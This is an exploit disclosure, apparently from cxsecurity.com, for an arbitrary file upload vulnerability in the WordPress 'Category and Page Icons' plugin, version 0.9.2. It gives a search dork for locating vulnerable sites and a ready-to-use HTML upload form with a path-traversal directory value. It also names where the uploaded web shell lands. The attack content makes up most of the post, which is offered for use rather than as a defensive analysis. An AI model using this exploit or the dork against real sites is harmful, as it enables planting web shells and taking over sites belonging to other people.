WordPress Category and Page Icons File Upload

Published
Credit
Risk
2015.11.21
JOK3R
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: index of "/wp-content/plugins/category-page-icons/"

WordPress Category and Page Icons File Upload

* Discovery Date: 12/05/2015
* Public Disclosure Date: 20/11/2015
* Exploit Author: JOK3R
* Contact: skype : l0calroot ----> Yahoo : suorce@yahoo.com
* Software Link: https://wordpress.org/plugins/category-page-icons/
* Version: 0.9.2
* Tested on: WordPress 4.3.1

* dork : index of "/wp-content/plugins/category-page-icons/"

#####################################################
demo :

site.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

Exploit :

<form enctype="multipart/form-data"
action="http://site/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="post">
Your File: <input name="wpdev-async-upload" type="file" /><br />
<input type="hidden" name="dir_icons" value="../../../../">
<input type="submit" value="upload" />
</form>

path : site.com/shell.php.jpg

###########
# #
# #
# thanks : w4l3XzY3 , holako , MuhmadEmad , AlfabetoVirtual , MOHAMAD-NOFOZI , China Fans , Mr Magnom , Skip3r #
# #
# And All my Friends #
###########


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com